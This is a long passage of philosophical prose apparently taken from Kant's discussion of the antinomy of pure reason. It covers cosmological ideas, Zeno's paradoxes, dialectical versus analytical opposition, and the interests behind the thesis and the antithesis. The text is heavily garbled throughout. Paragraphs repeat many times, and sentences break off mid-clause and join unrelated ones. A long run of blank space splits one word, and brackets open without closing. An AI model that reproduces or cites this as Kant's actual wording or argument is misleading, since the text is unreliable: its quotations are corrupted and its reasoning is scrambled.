In transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, without any condition of time, but in this minor premise they are possible only through the successive regress, which is given only in the process in which it is actually carried out.

When this error has thus been shown to be involved in the argument upon which both parties alike base their cosmological assertions, both might justly be dismissed, as being unable to offer any sufficient title in support of their claims.

But the quarrel is not thereby ended — as if one or both of the parties had been proved to be wrong in the actual doctrines they assert, that is, in the conclusions of their arguments. For although they have failed to support their contentions by valid grounds of proof, nothing seems to be clearer than that since one of them asserts that the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides, save by their becoming convinced that the very fact of their being able so admirably to refute one another is evidence that they are really quarrelling about nothing, and that a certain transcendental illusion has mocked them with a reality where none is to be found. This is the path which we shall now proceed to follow in the settlement of a dispute that defies all attempts to come to a decision.
* * *

Zeno of Elea, a subtle dialectician, was severely reprimanded by Plato as a mischievous Sophist who, to show his skill, would set out to prove a proposition through convincing arguments and then immediately overthrow them by other arguments equally strong. Zeno maintained, for example, that God (probably conceived by him as simply the world) is neither finite nor infinite, neither in motion nor at rest, neither similar nor dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing, because there is no other thing, nothing outside it, with which it could be compared. If two opposed judgments presuppose an inadmissible condition, then in spite of their opposition, which does not amount to a contradiction strictly so-called, both fall to the ground, inasmuch as the condition, under which alone either of them can be maintained, itself falls.

If it be said that all bodies have either a good smell or a smell that is not good, a third case is possible, namely, that a body has no smell at all; and both the conflicting propositions may therefore be false. If, however, I say: all bodies are either good-smelling or not good-smelling (vel suaveolens vel non suaveolens), the two judgments are directly contradictory to one another, and the former only is false, its contradictory opposite, that the world is not infinite, must be true. And I should thus deny the existence of an infinite world, without affirming in its place a finite world. But if we had said that the world is either infinite or finite (non-infinite), both statements might be false. For in that case we should be regarding the world in itself as determined in its magnitude, and in the opposed judgment we do not merely remove the infinitude, and with it perhaps the entire separate existence of the world, but attach a determination to the world, regarded as a thing actually existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       ce nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object, and from answering which the philosopher is not permitted to excuse himself on the plea of their impenetrable obscurity, are the cosmological.

These questions [bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of any object in itself, nor as regards possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical conditions of this advance (that which determines what members I shall meet with, or how far I can meet with any such in my regress) is transcendental, and is therefore necessarily unknown to me. We are not, however, concerned with this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference whether I say that in the empirical advance from this to other possible perceptions. For the appearances, as mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress of the series of appearances, and is not to be met with as something in itself. If, then, this series is always conditioned, and therefore can never be given as complete, the world is not an unconditioned whole, and does not exist as such a whole, either of infinite or of finite magnitude.

What we have here said of the first cosmological idea, that is, of the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, a regress in the series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of experience can never be determined save as conditioned.

These pseudo-rational assertions are so many attempts to solve four natural and unavoidable problems of reason. There are just so many, neither more nor fewer, owing to the fact that there are just four series of synthetic presuppositions which impose a priori limitations on the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience. (For how can there be any experience of the absolutely void? ) And yet to obtain absolute totality in the empirical synthesis it is always necessary that the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas we find on the side of empiricism, that is, of the antithesis: first, no such practical interest (due to pure principles of reason) as is provided for the thesis by morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject of all inner appearances, which is not itself appearance and consequently not given as object, and in which none of the categories (and it is to them that the question is really directed) meet with the conditions required for their application. We have here a case where the common saying holds, that no answer is itself an answer. A question as to the constitution of that something which cannot be thought through any determinate predicate — inasmuch as it is completely outside the sphere of those objects which can be given to us — is entirely null and void.]

The cosmological ideas alone have the peculiarity that they can presuppose their object, and the empirical synthesis required for its concept, as being given. The question which arises out of these ideas refers only to the advance in this synthesis, that is, whether it should be carried so far as to contain absolute totality — such totality, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience, and that even in thought reason is unable to bring them into harmony with the universal laws of nature. Yet they are not arbitrarily conceived. Reason, in the continuous advance of empirical synthesis, is necessarily led up to them whenever it endeavours to free from all conditions and apprehend in its unconditioned totality that which according to the rules of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of possible perceptions in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience. (For how can there be any experience of the absolutely void? ) And yet to obtain absolute totality in the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, there are two pure rational sciences, one purely speculative, the other with a practical content, namely, pure mathematics and pure ethics. Has it ever been suggested that, because of our necessary ignorance of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the question does not itself rest on a groundless presupposition, in that it plays with an idea the falsity of which can be more easily detected through study of its application and consequences than in its own separate representation.

This is the great utility of the sceptical mode of dealing with the questions which pure reason puts to pure reason. By its means we can deliver ourselves, at but a small cost, from a great body of sterile dogmatism, and set in its place a sober critique, which as a true cathartic will effectively guard us against such groundless beliefs and the supposed polymathy to which they lead.

If therefore, in dealing with a cosmological idea, I were able to appreciate beforehand that whatever view may be taken of the unconditioned in the successive synthesis of appearances, it must either be too large or too small for any concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge just where true insight and knowledge cease, and to represent as furthering speculative interests that which is valid only in relation to practical interests (in order, as may suit their convenience, to break the thread of physical enquiries, and then under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of empirical advance. They are therefore real if they stand in an empirical connection with my actual consciousness, although they are not for that reason real in themselves, that is, outside this advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object, but merely in order to have something corresponding to sensibility viewed as a receptivity.

To this transcendental cause, but only with the rule of the advance in the experience in which objects, that is to say, appearances, are given to me. Moreover, in outcome it is a matter of indifference whether I say that in the empirical advance in space I can meet with stars a hundred times farther removed than the outermost now perceptible to me, or whether I say that they are perhaps to be met with in cosmical space even though no human being has ever perceived or ever will perceive them. For even supposing they were given as things in themselves, without relation to possible experience, it still remains true that they are nothing to me, and therefore are not objects, save in so far as they are contained in the series of the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea of an absolute whole, and when, therefore, we are dealing with a question which oversteps the limits of possible experience, does distinction of the mode in which we view the reality of those objects of the senses become of importance, as serving to guard us against a deceptive error which is bound to arise if we misinterpret our empirical concepts.
§ 7
CRITICAL SOLUTION OF THE COSMOLOGICAL DIALECTIC

We have sufficiently proved in the Transcendental Aesthetic that everything intuited in space or time, and therefore all objects of any experience possible to us, are nothing but appearances, that is, mere representations, are in themselves real only in perception, which perception is in fact nothing but the reality of an empirical representation, that is, appearance. To call an appearance a real thing prior to our perceiving it, either means that in the advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, and are given only in this synthesis. It does not, therefore, follow, that if the conditioned, in the [field of] appearance viewed as a thing given in and by itself, prior to all regress. We must therefore say that the number of parts in a given appearance is in itself neither finite nor infinite. For an appearance is not something existing in itself, and its parts are first given in and through the regress of the decomposing synthesis, a regress which is never given in absolute completeness, either as finite or as infinite. This also holds of the series of subordinated causes, and of the series that proceeds from the conditioned to unconditioned necessary existence. These series can never be regarded as being in themselves in their totality either finite or infinite. But both alternatives are false (as shown in the proofs of the antithesis and thesis respectively). It is therefore also false that the world (the sum of all appearances) is a whole existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is not infinite, must be true. And I should thus deny the existence of an infinite world, without affirming in its place a finite world. But if we had said that the world is either infinite or finite (non-infinite), both statements might be false. For in that case we should be regarding the world in itself as determined in its magnitude, and in the opposed judgment we do not merely remove the infinitude, and with it perhaps the entire separate existence of the world, but attach a determination to the world, regarded as a thing actually existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposites.

If, therefore, we say that the world is either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposites, we are assuming that the world, the complete series of appearances, is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of its appearances. If, however, I reject this assumption, or rather this accompanying transcendental illusion, and deny that the world is a thing in itself that remains even if I suspend the infinite or the finite regress in the series of all its conditions is set us as a task. For it is involved in the very concept of the conditioned that something is referred to a condition, and if this condition is again itself conditioned, to a more remote condition, and so through all the members of the series. The above proposition is thus analytic, and has nothing to fear from a transcendental criticism. It is a logical postulate of reason, that through the understanding we follow up and extend as far as possible that connection of a concept with its conditions which directly results from the concept itself.

Further, if the conditioned as well as its condition are things in themselves, then upon the former being given, the regress to the latter is not only set as a task, but therewith already really given. And since this holds of all members of the series, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent thing, viewed as primordial being.

Thirdly, the thesis has also the advantage of popularity; and this certainly forms no small part of its claim to favour.

The common understanding finds not the least difficulty in the idea of the unconditioned be an empirical concept. Consequently, a limited world is too small for our concept. For we are constrained always still to look about for some other existence upon which it is dependent.

We have said that in all these cases the cosmical idea is either too large or too small for the empirical regress. Only in another sort of relation, when these appearances would be used for the cosmological idea has no bearing save upon an object of experience which has to be in conformity with a possible concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with the laws of nature, but only to think and to invent in the assurance that it cannot be refuted by the facts of nature, not being bound by the evidence which they yield, but presuming to pass them by or even to subordinate them to a higher authority, namely, that of pure reason.

The empiricist will never allow, therefore, that any epoch of nature is to be taken as the absolutely first, or that any limit of his insight into the extent of nature is to be regarded as the widest possible. Nor does he permit any transition from the objects of nature — which he can analyse through observation and mathematics, and synthetically determine in intuition (the extended) — to those which neither sense nor imagination can ever represent in concreto (the simple). Nor will he admit the legitimacy of assuming in nature itself any power that operates independently of the laws of nature (freedom), and so of encroaching upon the business of the understanding, which is that of investigating, according to necessary rules, the origin of appearances. And, lastly, he will not grant that a cause ought ever to be sought outside nature, in an original being. We know nothing but nature, since it alone can present objects to us and instruct us in regard to their laws.

If the empirical philosopher had no other purpose in propounding his antithesis than to subdue the rashness and presumption of those who so far misconstrue the true vocation of reason as to boast of insight and knowledge cease, and to represent as furthering speculative interest on the side of the thesis. When the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience. In all possible perceptions we always remain involved in conditions, whether in space or in time, and come upon nothing unconditioned requiring us to determine whether this unconditioned is to be located in an absolute beginning of synthesis, or in an absolute totality of a series that has no beginning.

In its empirical meaning, the term 'whole' is always only comparative. The absolute whole of quantity (the universe), the whole of division, of derivation, of the condition of existence in general, with all questions as to whether it is brought about through finite synthesis or through a synthesis requiring infinite extension, have nothing to do with any possible experience.

We should not, for instance, in any wise be able to explain the appearances of a body better, or even differently, in assuming that it consisted either of simple or of inexhaustibly composite parts; for neither a simple appearance nor an infinite composition can ever come before us. Appearances demand explanation only so far as the conditions of their explanation are given in perception; but all that may ever be given in this way, when taken together in an absolute whole, is not itself a perception. Yet it is just the explanation of this very whole that is demanded in the transcendental problems of reason.

Thus the solution of these problems can never be found in experience, and this is precisely the reason why we should not say that it is uncertain what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside the concept.

In transcendental philosophy, however, the only questions to which we have the right to demand a sufficient answer bearing on the constitution of the object] must refer exclusively to cosmological ideas. For the object must be given empirically, the question being only as to its conformity to an idea. If, on the other hand, the object is transcendental, and therefore itself unknown; if, for instance, the question be whether that something, the appearance of which (in ourselves) is thought (soul), is in itself a simple being, whether there is an absolutely necessary cause of all things, and so forth, what we have then to do is in each case to seek an object for our idea; and we may well confess that this object is unknown to us, though not therefore impossible.

[Although to the question, what is the constitution of a transcendental object, no answer can be given stating what it is, we can yet reply that the question itself is nothing, because there is no given object corresponding to it. Accordingly all questions dealt with in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

